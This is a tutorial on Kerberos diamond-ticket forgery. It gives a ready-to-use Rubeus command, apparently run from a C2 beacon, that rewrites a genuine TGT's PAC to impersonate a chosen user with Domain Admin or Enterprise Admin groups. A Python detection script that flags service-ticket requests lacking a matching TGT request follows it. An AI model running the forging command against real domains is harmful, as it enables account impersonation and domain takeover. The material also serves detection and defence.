A diamond ticket is a stealthier variant of a golden ticket: rather than forging a TGT from nothing, it takes a TGT that the DC legitimately issued, decrypts it with the krbtgt key, modifies the PAC (user and group RIDs) and re-encrypts it. Because the KDC really did issue the ticket (there is a genuine AS-REQ/AS-REP for it) and its lifetime and other fields stay within normal policy, it is harder to detect than a golden ticket, whose absurd lifetimes and missing AS-REQ are common detection hooks.
To generate a diamond ticket with Rubeus:
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe diamond /tgtdeleg /ticketuser:[target-user] /ticketuserid:[target-user-rid] /groups:[group-rids] /krbkey:[krbtgt-aes256-key-hex] /nowrap
/tgtdeleg: obtain a TGT for the current user through GSS-API and faked delegation (the "tgtdeleg" trick). It doesn't matter what the current user is: no elevation is needed to obtain this ticket, and the username in it will be overwritten anyway.
/ticketuser and /ticketuserid: the account to impersonate and its RID. These replace the original user in the rewritten PAC.
/groups: the group RIDs to place in the PAC. Use 512 for Domain Admins, 519 for Enterprise Admins.
/krbkey: the krbtgt AES256 key (hex), which is needed to decrypt the issued TGT and re-encrypt the modified one. Without it the ticket cannot be rewritten, so this attack still requires prior compromise of the krbtgt key, exactly like a golden ticket.
/nowrap: print the base64 ticket on one line so it can be copied straight into a subsequent Rubeus command.
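The stealth claim above has one DC-side exception worth knowing as both operator and defender: /tgtdeleg makes the DC log a 4768 (TGT requested) for the current low-privileged user, but the rewritten ticket is then presented as the target user, so the target user's 4769 (service ticket requested) events have no preceding 4768 from that client. The following correlation, an added example that is not from the original notes or from Rubeus, runs that check over a few constructed event records (field names mirror the 4768/4769 XML fields TargetUserName, IpAddress and TimeCreated; the accounts, hosts and times are made up):

```python
"""Flag 4769 (TGS-REQ) events whose account never obtained a TGT (4768) from the
same client within the TGT lifetime.

Added example, not from the original page or from Rubeus. The event records are
constructed to resemble Windows Security events 4768/4769; the field names are
an assumption about how the logs were parsed (e.g. from EVTX XML into dicts).
"""
from datetime import datetime, timedelta

# Constructed sample events (not real logs). 4769 TargetUserName is usually
# realm-qualified and 4768 IpAddress is usually IPv4-mapped, as in real data.
SAMPLE_EVENTS = [
    # Legitimate: alice gets a TGT, then a service ticket, from the same host.
    {"EventID": 4768, "TargetUserName": "alice", "IpAddress": "::ffff:192.0.2.10",
     "TimeCreated": "2024-05-01T09:00:00"},
    {"EventID": 4769, "TargetUserName": "alice@CORP.LOCAL", "ServiceName": "cifs/fs01",
     "IpAddress": "::ffff:192.0.2.10", "TimeCreated": "2024-05-01T09:00:05"},
    # Diamond ticket: /tgtdeleg produced a genuine AS-REQ for bob (the user the
    # operator is running as), but the rewritten TGT is then used as nlamb.
    {"EventID": 4768, "TargetUserName": "bob", "IpAddress": "::ffff:192.0.2.20",
     "TimeCreated": "2024-05-01T10:00:00"},
    {"EventID": 4769, "TargetUserName": "nlamb@CORP.LOCAL", "ServiceName": "cifs/dc01",
     "IpAddress": "::ffff:192.0.2.20", "TimeCreated": "2024-05-01T10:00:30"},
    # Golden ticket: no AS-REQ at all, the forged TGT goes straight to a TGS-REQ.
    {"EventID": 4769, "TargetUserName": "Administrator@CORP.LOCAL", "ServiceName": "ldap/dc01",
     "IpAddress": "::ffff:192.0.2.30", "TimeCreated": "2024-05-01T11:00:00"},
]


def account(name):
    """Normalise 'user@REALM' / 'User' to a lowercase bare name for matching."""
    return name.split("@", 1)[0].lower()


def client_ip(addr):
    """Strip the IPv4-mapped prefix the DC writes into IpAddress."""
    return addr[7:] if addr.startswith("::ffff:") else addr


def tgs_without_as(events, window=timedelta(hours=10)):
    """Return 4769 events with no 4768 for the same account from the same client
    IP in the preceding `window`. 10h is the default TGT lifetime; renewals can
    legitimately stretch it, so tune the window to your domain policy."""
    as_reqs = {}
    for ev in events:
        if ev["EventID"] == 4768:
            key = (account(ev["TargetUserName"]), client_ip(ev["IpAddress"]))
            as_reqs.setdefault(key, []).append(datetime.fromisoformat(ev["TimeCreated"]))

    hits = []
    for ev in events:
        if ev["EventID"] != 4769:
            continue
        t = datetime.fromisoformat(ev["TimeCreated"])
        key = (account(ev["TargetUserName"]), client_ip(ev["IpAddress"]))
        if not any(t - window <= a <= t for a in as_reqs.get(key, [])):
            hits.append(ev)
    return hits


def suspicious_accounts(events=SAMPLE_EVENTS):
    """Convenience wrapper: bare account names of the flagged 4769 events."""
    return [account(ev["TargetUserName"]) for ev in tgs_without_as(events)]


if __name__ == "__main__":
    for ev in tgs_without_as(SAMPLE_EVENTS):
        print(f"{ev['TimeCreated']} {ev['TargetUserName']} from {client_ip(ev['IpAddress'])} "
              f"-> {ev['ServiceName']}: TGS-REQ with no matching TGT request")
```

Both the diamond and the golden ticket are flagged by this rule; what the diamond ticket defeats is the other common golden-ticket heuristics (implausible ticket lifetime, encryption type that does not match the account, a PAC that does not match the user), not the AS/TGS correlation itself. The check also needs 4768/4769 from every DC in one place, since an operator can send the AS-REQ and the TGS-REQ to different DCs, and cross-domain referral TGTs will produce 4769s with no local 4768 and need to be excluded.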